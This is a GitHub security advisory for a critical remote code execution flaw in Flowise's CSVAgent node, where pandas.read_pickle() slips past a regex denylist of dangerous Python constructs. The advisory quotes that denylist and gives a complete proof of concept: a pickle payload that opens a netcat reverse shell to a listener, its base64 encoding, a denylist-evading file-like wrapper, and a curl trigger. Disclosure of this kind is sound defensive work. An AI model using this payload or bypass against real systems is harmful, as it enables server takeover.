{"id":"GHSA-x6vm-w76m-8j7g","summary":"Flowise: Remote Code Execution Vulnerability in CSVAgent","details":"### Summary\n\nThe CSVAgent node was observed to allow users to write Python code which gets executed via `pyodide`. The original intent was to allow users to utilise the `pandas` library for CSV processing. Although there is a denylist that checks for dangerous Python constructs from being passed in, `pandas` has a `read_pickle()` [function](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html) that deserialises a pickled payload and this can be leveraged to achieve code execution.\n\n### Details\n\nThe affected file is the `CSVAgent` node, found in: `flowise-components/nodes/agents/CSVAgent/CSVAgent.ts`.\n\n```js\ntry {\n    const code = `import pandas as pd\nimport base64\nfrom io import StringIO\nimport json\n\nbase64_string = \"${base64String}\"\n\ndecoded_data = base64.b64decode(base64_string)\n\ncsv_data = StringIO(decoded_data.decode('utf-8'))\n\ndf = pd.${customReadCSVFunc} \u003c1\u003e\nmy_dict = df.dtypes.astype(str).to_dict()\nprint(my_dict)\njson.dumps(my_dict)`\n    dataframeColDict = await pyodide.runPythonAsync(code)\n} catch (error) {\n    throw new Error(error)\n}\n```\n\nAt \u003c1\u003e, the `customReadCSVFunc` is supplied by the user. This input goes through input validation that denies dangerous Python constructs from being passed in:\n\n```py\nconst FORBIDDEN_PATTERNS: Array\u003c{ pattern: RegExp; reason: string }\u003e = [\n    // Imports (the executor pre-imports pandas and numpy; LLM code must not add any imports)\n    { pattern: /\\bfrom\\s+\\S+\\s+import\\b/g, reason: 'import statement (from...import)' },\n    { pattern: /\\bimport\\b/g, reason: 'import statement (all imports forbidden; pandas and numpy are pre-imported by the executor)' },\n    // Dangerous builtins\n    { pattern: /\\beval\\s*\\(/g, reason: 'eval()' },\n    { pattern: /\\bexec\\s*\\(/g, reason: 'exec()' },\n    { pattern: /\\bcompile\\s*\\(/g, reason: 'compile()' },\n    { pattern: /\\b__import__\\s*\\(/g, reason: '__import__()' },\n    { pattern: /\\bopen\\s*\\(/g, reason: 'open()' },\n    { pattern: /\\bbreakpoint\\s*\\(/g, reason: 'breakpoint()' },\n    { pattern: /\\binput\\s*\\(/g, reason: 'input()' },\n    { pattern: /\\braw_input\\s*\\(/g, reason: 'raw_input()' },\n    { pattern: /\\bglobals\\s*\\(/g, reason: 'globals()' },\n    { pattern: /\\blocals\\s*\\(/g, reason: 'locals()' },\n    { pattern: /\\bgetattr\\s*\\(/g, reason: 'getattr()' },\n    { pattern: /\\bsetattr\\s*\\(/g, reason: 'setattr()' },\n    { pattern: /\\bdelattr\\s*\\(/g, reason: 'delattr()' },\n    { pattern: /\\breload\\s*\\(/g, reason: 'reload()' },\n    { pattern: /\\bfile\\s*\\(/g, reason: 'file()' },\n    { pattern: /\\bexecfile\\s*\\(/g, reason: 'execfile()' },\n    // Dangerous modules / attributes\n    { pattern: /\\bos\\./g, reason: 'os module' },\n    { pattern: /\\bsubprocess\\./g, reason: 'subprocess module' },\n    { pattern: /\\bsys\\./g, reason: 'sys module' },\n    { pattern: /\\bsocket\\./g, reason: 'socket module' },\n    { pattern: /\\burllib\\./g, reason: 'urllib module' },\n    { pattern: /\\brequests\\./g, reason: 'requests module' },\n    { pattern: /\\b__builtins__\\b/g, reason: '__builtins__' },\n    { pattern: /\\b__loader__\\b/g, reason: '__loader__' },\n    { pattern: /\\b__spec__\\b/g, reason: '__spec__' },\n    { pattern: /\\b__class__\\b/g, reason: '__class__ (reflection)' },\n    { pattern: /\\b__subclasses__\\s*\\(/g, reason: '__subclasses__()' },\n    { pattern: /\\b__bases__\\b/g, reason: '__bases__' },\n    { pattern: /\\b__mro__\\b/g, reason: '__mro__' },\n    { pattern: /\\b__globals__\\b/g, reason: '__globals__' },\n    { pattern: /\\b__code__\\b/g, reason: '__code__' },\n    { pattern: /\\b__closure__\\b/g, reason: '__closure__' },\n    { pattern: /\\bvars\\s*\\(/g, reason: 'vars()' },\n    { pattern: /\\bdir\\s*\\(/g, reason: 'dir()' },\n    { pattern: /\\b__dict__\\b/g, reason: '__dict__ (attribute reflection)' },\n    { pattern: /\\b__module__\\b/g, reason: '__module__ (module reflection)' }\n]\n```\n\nHowever, by using `pandas.read_pickle()`, an attacker can achieve code execution without hitting any of the denied words.\n\n### PoC\n\nFirst, generate a pickled payload that performs an OS command (replace the IP and port with your listening IP and port):\n\n```py\nimport pickle\nimport base64\nimport os\n\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, (\"/usr/bin/nc 172.17.0.1 13337 -e /bin/sh\",))\n\npayload = pickle.dumps(Exploit())\nencoded = base64.b64encode(payload).decode()\nprint(encoded)\n```\n\nRun it and note the encoded payload to be used later:\n\n```bash\n$ python3 pickle-payload-poc.py\n\ngASVQgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCcvdXNyL2Jpbi9uYyAxNzIuMTcuMC4xIDEzMzM3IC1lIC9iaW4vc2iUhZRSlC4=\n```\n\n1. In the Flowise dashboard, navigate to Chatflows and create or modify an existing Chatflow.\n2. Drag a \"CSV Agent\" node onto the canvas.\n3. Click on \"Additional Parameters\" and fill in the following PoC:\n\n```py\nisnull(\"\")\nclass MiniBytesIO:\n    def __init__(self, b):\n        self.data = b\n        self.pos = 0\n    def read(self, n=-1):\n        if n == -1:\n            n = len(self.data) - self.pos\n        chunk = self.data[self.pos:self.pos+n]\n        self.pos += n\n        return chunk\n    def readline(self, n=-1):\n        if self.pos \u003e= len(self.data):\n            return b\"\"\n        next_nl = self.data.find(b\"\\\\n\", self.pos)\n        if next_nl == -1:\n            next_nl = len(self.data)\n        if n != -1:\n            next_nl = min(self.pos + n, next_nl)\n        line = self.data[self.pos:next_nl+1]\n        self.pos = next_nl + 1\n        return line\npd.read_pickle(MiniBytesIO(base64.b64decode(\"gASVQgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCcvdXNyL2Jpbi9uYyAxNzIuMTcuMC4xIDEzMzM3IC1lIC9iaW4vc2iUhZRSlC4=\")))\n```\n\nThe custom `MiniBytesIO` class  needs to be included in order to deserialise the pickled payload, since `read_pickle()` expects a \"str, path object, or file-like object\". This is because we cannot use `import` to import `BytesIO`, nor `open()` to write to disk and read, and entering a URL does not work due to `pyodide` not having raw socket capabilities.\n\nSave the chatflow, and obtain the UUID of this chatflow from the URL `/canvas/\u003cUUID\u003e`.\n\nOpen a listening shell on your specified port from your listening host, and send a POST request to the chatflow to trigger it and achieve code execution:\n\n```\n$ curl -X POST http://\u003cTARGET\u003e/api/v1/prediction/\u003cUUID\u003e\n```","aliases":["CVE-2026-69256"],"modified":"2026-08-04T18:00:18.084804722Z","published":"2026-08-04T15:46:20Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-08-04T15:46:20Z","nvd_published_at":null,"cwe_ids":["CWE-94"],"severity":"CRITICAL"},"references":[{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x6vm-w76m-8j7g"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/pull/6257"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/commit/c79fe56a6c249850e96bce9b4859f7a0083e4507"},{"type":"PACKAGE","url":"https://github.com/FlowiseAI/Flowise"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise@3.1.3"}],"affected":[{"package":{"name":"flowise-components","ecosystem":"npm","purl":"pkg:npm/flowise-components"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.1.3"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.1.2","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-x6vm-w76m-8j7g/GHSA-x6vm-w76m-8j7g.json"}},{"package":{"name":"flowise","ecosystem":"npm","purl":"pkg:npm/flowise"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.1.3"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.1.2","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-x6vm-w76m-8j7g/GHSA-x6vm-w76m-8j7g.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"}]}